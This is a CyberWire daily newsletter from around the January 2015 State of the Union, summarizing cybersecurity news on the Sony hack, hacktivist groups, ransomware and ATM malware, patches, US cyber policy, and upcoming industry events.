Reports assert that Sony's hackers exploited a zero-day vulnerability in their assault on the film company. (What that zero-day may have been is left unspecified due to its "sensitivity.")
CyberBerkut is tied more closely to recent attacks on German government sites. One of their operatives, "Mink," is said to be Australian, which indicates how geographically broad a net governments cast when they trawl for useful idiots ("полезные дураки," as Lenin might or might not have called them) in cyberspace.
Recorded Future continues its look at Lizard Squad, and finds its members are about what one would expect.
ComRAT and CryptoWall 3.0 continue to operate against their targets, respectively military and civilian. Analysts describe the workings of Vawtrak and Tyupkin malware families.
New vulnerabilities and proof-of-concept attacks are described.
Oracle and Ubuntu issue patches.
Corporate boards take cyber risk management to heart.
The US President's State of the Union address, much anticipated by the cyber sector, appears to have driven a rise in security industry story stocks. Last night's speech prominently featured President Obama's proposed cyber legislation, which he pointedly dropped in Congressional laps. Observers like information sharing, are dubious about disclosure rules, and don't at all care for what many see as entrusting civil liberties in cyberspace to prosecutorial discretion. Defense Department cyber roles and missions will probably serve as a bellwether for legislative direction.
The US and UK make their already close cyber cooperation closer still. (The lads from Malvern really want a share of the US cyber market.)
Today's issue includes events affecting Australia, China, France, Germany, Democratic Peoples Republic of Korea, Russia, Saudi Arabia, Ukraine, United Kingdom, United States.
Cyber Attacks, Threats, and Vulnerabilities
Here's What Helped Sony's Hackers Break In: Zero-Day Vulnerability(Re/code) The hackers behind the devastating attack against Sony Pictures Entertainment late last year exploited a previously undisclosed vulnerability in its computer systems that gave them unfettered access and enabled them to reach and attack other parts of the studio's network
Hacktivist Group CyberBerkut Behind Attacks on German Official Websites(TrendLabs Security Intelligence Blog) A pro-Russian group called CyberBerkut claimed responsibility for a recent hack on certain German government websites in early January. We were able to gather some information on some of its members based on Pastebin data that had been leaked by the Ukrainian nationalist political party (Pravy Sektor)
Lizard Squad: Two Bot Thugs(Recorded Future) Web intelligence has led to an analysis of Lizard Squad's Linux botnet, LizardStresser or lizardstresser.su. Further link analysis of an email address associated with LizardStresser led to the discovery of a Windows botnet on ernsthaft.su. Analysis of key cyber personas in Lizard Squad via their Twitter accounts through Recorded Future illuminated their interest in illegal drugs, thugs, guns, and Nazis
Traffic Patterns For CryptoWall 3.0(Internet Storm Center) Various sources have reported version 3 of CryptoWall has appeared. This malware is currently seen from exploit kits and phishing emails. CryptoWall is one of many ransomware trojans that encrypt the personal files on your computer and demand a bitcoin payment before you can unlock them
Tyupkin ATM Malware Analysis(Infosec Institute) Some time ago, Kaspersky discovered and reported a new type of malicious program called Tyupkin, which targets ATM machines by moving beyond targeting consumers with card skimmers that steal debit card numbers to directly getting cash from an ATM without the need for a counterfeit or stolen card
Vivino wine-lovers' app leaked personal information(Hot for Security) Vivino, a popular smartphone app, that allows wine-lovers to scan their favourite bottles of plonk and share recommendations with their friends, has left a sour taste in the mouth — after a security researcher found a privacy vulnerability
11% of Android banking and finance apps are dangerous(Help Net Security) RiskIQ found that more than 40,000 of the 350,000 apps which reference banking in the world's top 90 app stores contain malware or suspicious binaries. Another 40,000 contained dangerous permissions
Looking Back (and Forward) at PoS Malware(TrendLabs Security Intelligence Blog) 2014 became the year that placed PoS (point-of-sale) threats in the spotlight. Make no mistake — PoS threats have existed for years. However, the Target data breach last January was the first incident that made the general public notice this threat
Ubuntu Patches Several Security Flaws(Threatpost) Ubuntu has released a number of patches for security vulnerabilities in several versions of the OS, including some remote code execution flaws in Thunderbird, which is included with Ubuntu
World Economic Forum Warns About "Global Threat" of IoT Hacking(Gizmodo) You know that character in some horror films who warns unsuspecting (usually) teenage victims of their impending death? The World Economic Forum's Global Risks report is kind of like that guy, filled with doom but offering damn good advice on how to stay alive. This year, the report focused on the internet of things?
Cybersecurity stocks gain on pending Obama proposals(Seeking Alpha) The White House has disclosed Pres. Obama will outline this week "a series of legislative proposals and executive actions that will be in his [Jan. 20] State of the Union that will tackle identity theft and privacy issues, cybersecurity, and access to the Internet."Several security tech plays, some of whom received a lift last month from the Sony hack and its fallout, are higher in spite of a 0.9% Nasdaq drop. FEYE +4.5%. CUDA +6.9%. PANW +1.2%. CYBR +1.7%. PFPT +1.3%
Cyber resilience core to safeguarding investment value(COOConnect) The warning by the Bank of England's Financial Policy Committee last month that financial firms in the UK are underestimating the threat of cybercrime, coupled with recent high-profile blow-by-blow media accounts of companies under attack, are set to keep cyber resilience firmly on corporate governance agendas. For private equity firms, such risks pose fundamental challenges. Cyber attacks have a significant impact on victims, with some 60% of small firms forced to close within six months of an attack, according to the US National Cyber Security Alliance
Amendment to Combined Synopsis/Solicitation — for Information Assurance, Operations and Compliance, Systems and Technology Support Services(Insurance News Net) This announcement is prepared and posted in accordance with Federal Acquisition Regulation (FAR) Subpart 5.2 to notify potential Offerors of a solicitation for services for the Defense Microelectronics Activity (DMEA). Solicitation number HQ0727-15-R-0003 requests proposals for for Information Assurance, Operations and Compliance, Systems and Technology Support Services for all Defense Microelectronics Activity (DMEA). The objective of this contract is to acquire services for Information Assurance, Operations and Compliance, Systems and Technology Support Services for all Defense Microelectronics Activity (DMEA) information technology,networking, communications, safety, surveillance, and critical infrastructure software, systems, and applications
Cybersecurity contractor opens center in Augusta(Augusta Chronicle) Chiron Technology Services, a Maryland-based cybersecurity company, opened a Regional Cybersecurity Development Center Jan. 1 on Interstate Parkway, according to local real estate company Sherman & Hemstreet
LockPath Prepares for 2015 by Doubling Executive Team(Marketwired) LockPath Inc. has added four members to its executive team in the past month to enhance the company's ability to serve its growing client base, lead its expanding workforce and execute its growth strategy in 2015
CyberSecurity.com Acquired by Adam Strong(Domain Investing) 2014 was a big year for Adam Strong. His company sold the high profile domain names Racing.com and BTC.com, and he also privately acquired quite a few keyword domain names, such as Strong.com
World Economic Forum Proposes New Cyber Risk Framework(SecurityWeek) With the annual World Economic Forum meeting in Switzerland just days away, the organization and its partners have released a new framework designed to help businesses calculate the impact of cyber-threats
Partnering for Cyber Resilience Towards the Quantification of Cyber Threats(World Economic Forum) Threats grow with the rapid expansion of data-driven technologies. The convergence of web, cloud, social, mobile and Internet of Things platforms is inherently oriented to sharing data, not security. As these technologies expand in use, so do the risks, making cyber risk management imperative to organizations today
Heightened cyber threat demands risk focus(Actuarial Post)
Cyber and terrorism have been rated the most significant emerging risks facing the insurance and reinsurance sector in 2015, according to a survey of US industry executives. It is a sentiment reflected by the UK government, which last month convened a group of CEOs from the country's largest insurers, to encourage collaboration and "to make the UK one of the safest places to do business in cyberspace". While the insurance sector is set to play a key role in minimising the long-term financial fallout from an attack, cyber risks cannot be tackled with insurance alone
Network Segmentation: A Best Practice We Should All be Using(Infosec Island) It would be nice to be able to say that we are winning the war; that network security efforts are slowly getting the better of the bad guys. But I can't do that. Despite all the money being thrown at security tools and hosted services, the cyber-thugs are improving their game at a faster rate than we are. The ten worst known cyber security breaches of this century have all taken place since 2008, and 2013 and 2014 are notorious for their information security incidents
Bash data exfiltration through DNS (using bash builtin functions)(forsec) After gaining 'blind' command execution access to a compromised Linux host, data exfiltration can be difficult when the system ibinbash2s protected by a firewall. Sometimes these firewalls prevent the compromised host to establish connections to the internet. In these cases, data exfiltration through the DNS-protocol can be useful. In a lot of cases DNS-queries are not blocked by a firewall. I've had a real life situation like this, which I will describe later on
Exploit Pack — Open Source Security Project for Penetration Testing and Exploit Development(Kitploit) Exploit Pack, is an open source GPLv3 security tool, this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Iimpact are ready to use as well but you will require an expensive license to get access to all the features, for example: automatic exploit launching, full report capabilities, reverse shell agent customization, etc. Exploit Pack is fully free, open source and GPLv3. Because this is an open source project you can always modify it, add or replace features and get involved into the next project decisions, everyone is more than welcome to participate. We developed this tool thinking for and as pentesters. As security professionals we use Exploit Pack on a daily basis to deploy real environment attacks into real corporate clients
Discovering and remediating an active but disused botnet(Colin Keigher) On a network I help manage, we kept getting malicious DNS alerts for "luna1.pw" on an appliance we had installed. Due to the way the network was configured, we were able to see the name request coming in but no traffic activity. This was unusual because the appliance was configured to monitor all traffic but why was it not picking up anything further than what it was reporting? Why didn't the supposed malware connect? Resolving the domain lead to an answer
Finding Privilege Escalation Flaws in Linux(Internet Storm Center) We often tend to ignore privilege escalation flaws. In order to take advantage of these vulnerabilities, an attacker first needs to have access to the system itself. But in particular for systems that many users have access to, it can be difficult to monitor them all for compromised credentials. Systems with web servers often suffer from web application flaws that can be used to execute code as the web server, which then can be used to gain root access via a privilege escalation flaw
British Spy Agency Has Its Eye on Investigative Journalists(Sputnik News) As some of the West's most senior cyber-security defence chiefs meet in London, fresh documents revealed by former CIA contractor Edward Snowden — now living in Moscow — show that the UK intelligence agency GCHQ has hacked thousands of emails from journalists
7 Reasons Security Wonks Should Watch the State of the Union Tonight(Wired) President Obama has left few questions about what he plans to unveil in his State of the Union address tonight, having dropped several previews in the last two weeks about legislation the White House is proposing. He will undoubtedly go into more detail tonight at 9 p.m. ET, and we will be watching specifically to hear him expand on comments already made about proposed changes to cybersecurity legislation
Obama cybersecurity proposals: 'Devil is in the details'(Al Jazeera: the Scrutineer) In a preview of next Tuesday's State of the Union address, President Obama spent this week rolling out a long list of new cybersecurity initiatives that includes legislation to protect consumers' private data
The Hypocrisy of U.S. Cyber Policy(TechCrunch) The breakneck growth in internet usage over the past two decades has forced policymakers to confront a host of challenges, from how to regulate the sharing economy to who owns the infrastructure behind the "tubes" themselves. While tempers have flared on a number of these issues, I tend to give the benefit of the doubt to policymakers. The transformation of our society has been so complete and rapid, we simply can't expect the rebuilding of our laws to be a simple proposition
Bold reform needed to strengthen U.S cybersecurity(Help Net Security) Mr. President, the status quo in cybersecurity is failing the U.S. It is failing the commercial sector, which is being publicly breached on a weekly basis, and it is failing the government as well. It is time to take bold and decisive action to stop these dangerous and embarrassing hacks before they cause further damage and erode the confidence that is vital to the U.S. economy
Microsoft and the US government fight over data in the cloud(WinBeta) The battle of big business versus big government is being fought among the clouds or at least among Microsoft's international cloud servers. Microsoft's director of cyber security and cloud strategy has shared a post titled 'Privacy considerations in a cloudy world.' The post highlights points regarding Microsoft's cyber security made by their Chief Privacy Officer in a video (embedded below). Microsoft is amidst a battle with the government when it comes to protecting their user's data
Nearly all US arms programs found vulnerable to cyber attack(IT News) Nearly every US weapons program tested in fiscal 2014 showed "significant vulnerabilities" to cyber attacks, including misconfigured, unpatched and outdated software, the Pentagon's chief weapons tester revealed in his annual report
Silk Road Judge 'Eviscerates' Defense's Evidence That Mt. Gox CEO Was a Suspect(Wired) Last week produced a stunner in the Silk Road trial: the revelation that the Department of Homeland Security suspected Mt. Gox CEO Mark Karpeles of running the massive, anonymous narcotics market just months before settling instead on defendant Ross Ulbricht. But just as quickly as Ulbricht's defense revealed that alternate theory of the Silk Road's ownership, the prosecution and judge have shoved key elements of the story back into the closet
How Was Your Credit Card Stolen?(KrebsOnSecurity) Almost once a week, I receive an email from a reader who has suffered credit card fraud and is seeking help figuring out which hacked merchant was responsible. I generally reply that this is a fruitless pursuit, and instead encourage readers to keep a close eye on their card statements and report any fraud. But it occurred to me recently that I've never published a primer on the types of card fraud and the likelihood with each of the cardholder ever learning how their account was compromised. This post is an effort to remedy that
For a complete running list of events, please visit the Event Tracker on the CyberWire website.
Cyber Security Summit: Industrial Sector & Governments(Prague, Czech Republic, April 14 - 15, 2015) Cyber Security Summit Europe — Industrial Sector & Governments brings together cyber security experts who will share their skills and know-how needed to address highly topical issues such as state-sponsored...
Cyber Security Summit: Fnancial Services(Prague, Czech Republic, April 14 - 15, 2015) Cyber Security Summit Europe — Financial Services brings together cyber security experts across the financial sector to discuss topical security vulnerabilities as well as bring forward effective...
FIC 2015(Lille, France, January 20 - 21, 2015) The International Cybersecurity Forum (FIC) forms part of a thinking and exchange process that aims at promoting a pan-European vision of cybersecurity and strengthening the fight against cybercrime, a...
AppSec California(Santa Monica, California, USA, January 26 - 28, 2015) OWASP's AppSec California goes beyond "security for security?s sake" bringing application security professionals and business experts together with the objective of sharing new information that helps get...
Financial Cryptography and Data Security 2015(San Juan, Puerto Rico, USA, January 26 - 30, 2015) The goal of the conference is to bring security and cryptography researchers and practitioners together with economists, bankers, implementers and policy-makers. Intimate and colourful by tradition, the...
Data Privacy Day San Diego — The Future of IoT and Privacy(San Diego, California, USA, January 28, 2015) Join the Lares Institute, Morrison & Foerster, and the National Cyber Security Alliance for Data Privacy Day in San Diego. DPD San Diego will bring together privacy luminaries to discuss fundamental issues...
CSEAN Cyber Secure Nigeria 2015 Conference(Garki Abuja, Nigeria, January 29, 2015) The vast scope of cyber threats makes a compelling case for a multi-stakeholder collaboration in curbing domestic and International threat. "Cyber Secure Nigeria 2015" conference encapsulates various hot...
Data Connectors Los Angeles 2015(Los Angeles, California, USA, January 29, 2015) The Los Angeles Tech-Security Conference features 25-30 vendor exhibits and several industry experts discussing current tech-security issues such as email security, VoIP, LAN security, wireless security,...
Transnational Organized Crime as a National Security Threat(Washington, DC, USA, January 29, 2015) United Kingdom's National Crime Agency Director General Keith Bristow will discuss transnational organized crime as a national security threat, focusing on economic and cyber crimes, and digging into the...
ISSA CISO Forum(Atlanta, Georgia, USA, January 29 - 30, 2015) Corporate Information Security and Legal programs must be closely aligned to be successful in today's world. Customer and vendor contracts require strong security language. Response to data breaches are...
NEDForum > London "What we can learn from the Darknet" (London, England, UK, January 30, 2015) The 2nd NED Forum event comes to London on Friday 30th January 2015, the day of the White Hat Ball. The event will focus on the Darknet and where it provides a rich source of learning that can be applied...
Cyber Threat Intelligence Summit(Washington, DC, USA, February 2 - 9, 2015) Join SANS for this innovative event as we focus on enabling organizations to build effective cyber threat intelligence analysis capabilities
Suits and Spooks(Washington, DC, USA, February 4 - 5, 2015) Suits and Spooks DC (Feb 4-5, 2015) is moving to the Ritz Carlton hotel in Pentagon City! We're expanding our attendee capacity to 200 and for the first time will be including space for exhibitors. We...
Nullcon 2015(Goa, India, February 4 - 7, 2015) Nullcon discusses and showcase the future of information security, next-generation of offensive and defensive security technology as well as unknown threats
ICISSP 2015(Angers, Loire Valley, France, February 9 - 11, 2015) The International Conference on Information Systems Security and Privacy aims at creating a meeting point of researchers and practitioners that address security and privacy challenges that concern information...
2015 Cyber Risk Insights Conference — London(London, England, UK, February 10, 2015) The cyber threat landscape is undergoing rapid change. Lloyd's and the London market are at the forefront of developing insurance products to address the evolving exposures of organizations throughout...
AFCEA West 2015(San Diego, California, USA, February 10 - 12, 2015) Showcasing emerging systems, platforms, technologies and networks that will impact all areas of current and future Sea Service operations.
Cybersecurity: You Don't Know What You Don't Know(Birmingham, Alabama, USA, February 24 - 25, 2015) What: Connected World Conference in partnership with University of Alabama at Birmingham's Center for Information Assurance and Joint Forensics Research (The Center) have teamed up to bring professionals...
SPONSOR & SUPPORT
Grow your brand and reach new customers.
Grow your brand and increase your customer base by educating our audience about your products, services, and events by advertising on The CyberWire. We’ve built trust with an influential (and often hard to reach) audience of CISOs, CSOs, and other senior execs in the security space, across a wide array of industry verticals. Learn more.
Be a part of the CyberWire story.
People ask us (a lot) how they can support what we do. We have our sponsorships and services, of course, but those are not always within every supporter's financial reach, or it might just not be the right time for you to do those things. That's why we launched our new Patreon site, where we've created a wider variety of support levels, each with some new benefits. Our patrons are important to our future, and we hope you'll consider becoming one. We invite you to become part of the CyberWire story. Become a patron today.